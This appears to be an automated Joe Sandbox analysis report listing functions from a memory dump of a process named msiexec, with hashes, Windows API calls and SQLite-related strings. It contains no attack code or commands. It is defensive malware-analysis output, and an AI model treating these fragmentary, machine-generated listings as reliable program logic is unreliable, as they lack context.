• Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
• Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
• Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
• Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID:
• String ID: foreign key constraint failed$new$oid$old
• API String ID: 0-1953309616
• Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
• Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
• Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
• Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
APIs
Strings
• foreign key on %s should reference only one column of table %T, xrefs: 004316CD
• unknown column "%s" in foreign key definition, xrefs: 00431858
• number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy
• String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
• API String ID: 3510742995-272990098
• Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
• Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
• Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
• Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
• memset.MSVCRT ref: 0040C439
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
• _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
• memset.MSVCRT ref: 0040C4D0
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: free$EnumValuememset$_wcsuprmemcpywcslen
• String ID:
• API String ID: 1265369119-0
• Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
• Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
• Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
• Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
APIs
• memset.MSVCRT ref: 0044A6EB
• memset.MSVCRT ref: 0044A6FB
• memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
• memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpymemset
• String ID: gj
• API String ID: 1297977491-4203073231
• Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
• Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
• Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
• Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
APIs
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
• ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
• ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
• ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
• ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
• free.MSVCRT ref: 0040E9D3
  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2241099983-0
                                                                                                        • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                        • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                        • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                        • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                        APIs
                                                                                                        • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                        • malloc.MSVCRT ref: 004174BD
                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                        • free.MSVCRT ref: 004174E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 4053608372-0
                                                                                                        • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                        • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                        • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                        • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 0040D453
                                                                                                        • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                        • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                                                        • String ID:
                                                                                                        • API String ID: 4247780290-0
                                                                                                        • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                        • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                        • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                        • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                        APIs
                                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                        • memset.MSVCRT ref: 004450CD
                                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                          • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1471605966-0
                                                                                                        • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                        • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                        • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                        • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                        APIs
                                                                                                        • wcscpy.MSVCRT ref: 0044475F
                                                                                                        • wcscat.MSVCRT ref: 0044476E
                                                                                                        • wcscat.MSVCRT ref: 0044477F
                                                                                                        • wcscat.MSVCRT ref: 0044478E
                                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                          • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                          • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                        • String ID: \StringFileInfo\
                                                                                                        • API String ID: 102104167-2245444037
                                                                                                        • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                        • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                        • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                        • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                        APIs
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 613200358-0
                                                                                                        • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                        • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                        • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                        • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memicmpwcslen
                                                                                                        • String ID: @@@@$History
                                                                                                        • API String ID: 1872909662-685208920
                                                                                                        • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                        • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                        • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                        • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004100FB
                                                                                                        • memset.MSVCRT ref: 00410112
                                                                                                          • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                          • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                        • _snwprintf.MSVCRT ref: 00410141
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                        • String ID: </%s>
                                                                                                        • API String ID: 3400436232-259020660
                                                                                                        • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                        • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                        • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                        • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040D58D
                                                                                                        • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                        • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                        • String ID: caption
                                                                                                        • API String ID: 1523050162-4135340389
                                                                                                        • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                        • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                        • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                        • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                        APIs
                                                                                                          • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                          • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                        • String ID: MS Sans Serif
                                                                                                        • API String ID: 210187428-168460110
                                                                                                        • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                        • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                        • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                        • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClassName_wcsicmpmemset
                                                                                                        • String ID: edit
                                                                                                        • API String ID: 2747424523-2167791130
                                                                                                        • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                        • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                        • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                        • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                        • String ID: SHAutoComplete$shlwapi.dll
                                                                                                        • API String ID: 3150196962-1506664499
                                                                                                        • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                        • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                        • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                        • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                        • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                        • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                        • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                        • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memcmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 3384217055-0
                                                                                                        • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                        • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                        • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                        • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 368790112-0
                                                                                                        • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                        • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                        • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                        • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                        APIs
                                                                                                          • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                          • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                          • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                          • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                          • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                        • GetMenu.USER32(?), ref: 00410F8D
                                                                                                        • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                        • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                        • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                        • String ID:
                                                                                                        • API String ID: 1889144086-0
                                                                                                        • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                        • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                        • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                        • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                        APIs
                                                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                        • GetLastError.KERNEL32 ref: 0041810A
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1661045500-0
                                                                                                        • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                        • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                        • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                        • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                        APIs
                                                                                                          • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                        • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                        Strings
                                                                                                        • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                        • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                        • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                        • API String ID: 1297977491-2063813899
